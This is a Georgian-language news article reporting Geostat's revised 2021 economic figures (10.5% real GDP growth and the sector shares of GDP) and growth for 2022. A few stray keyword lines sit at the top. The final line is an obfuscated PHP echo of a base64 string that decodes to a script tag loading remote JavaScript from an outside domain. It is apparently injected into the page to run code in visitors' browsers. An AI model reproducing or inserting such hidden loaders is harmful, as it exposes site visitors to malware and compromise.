gorgia
ავერსი jaluzi
სტატისტიკის ეროვნულმა სამსახურმა დღეს 2021 წლის ეკონომიკური ზრდის დაზუსტებული სტატისტიკა გამოაქვეყნა. ანგარიშის თანახმად, გასულ წელს საქართველოს ეკონომიკა 10.5%-ით გაიზარდა, ეს მაჩვენებელი 0.1 პროცენტული პუნქტით აღემატება საქსტატის წინასწარ შეფასებას (10.4%-ს).
 
მიმდინარე ფასებში 2021 წელს საქართველოს ეკონომიკის ზომამ 60 მილიარდ ლარს მიაღწია, რაც ნომინალურად 2020 წელთან მიმართებით 21.8%-ით მეტი იყო.
 
მაღალი ინფლაციის გამო, მშპ-ს დეფლატორი 10.3%-ს შეადგენდა, შესაბამისად, რეალური ზრდა 10.5% იყო.
 
“მთლიანი შიდა პროდუქტის დარგობრივ სტრუქტურაში ყველაზე დიდი წილით გამოირჩევა საბითუმო და საცალო ვაჭრობა; ავტომობილების და მოტოციკლების რემონტი (15.4 პროცენტი) და დამამუშავებელი მრეწველობა (11.3 პროცენტი). შემდგომ პოზიციებს იკავებს უძრავ ქონებასთან დაკავშირებული საქმიანობები (10.2 პროცენტი), მშენებლობა (7.5 პროცენტი), სოფლის სატყეო და თევზის მეურნეობა (7.4 პროცენტი), სახელმწიფო მმართველობა და თავდაცვა; სავალდებულო სოციალური უსაფრთხოება (6.5 პროცენტი), ტრანსპორტი და დასაწყობება (6.3 პროცენტი), საფინანსო და სადაზღვევო საქმიანობები (5.2 პროცენტი), ჯანდაცვა და სოციალური მომსახურების საქმიანობები (4.8 პროცენტი) და განათლება (4.7 პროცენტი),”- ნათქვამია საქსტატის მიერ გამოქვეყნებულ ანგარიშში.
 
რაც შეეხება 2022 წლის შედეგებს, მიმდინარე წლის 9 თვეში საქართველოს ეკონომიკურმა ზრდამ 10.2% შეადგინა, მთავრობის განახლებული პროგნოზით, წელს ეკონომიკური ზრდა 10%, ხოლო მომდევნო წელს 5% იქნება.
482
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");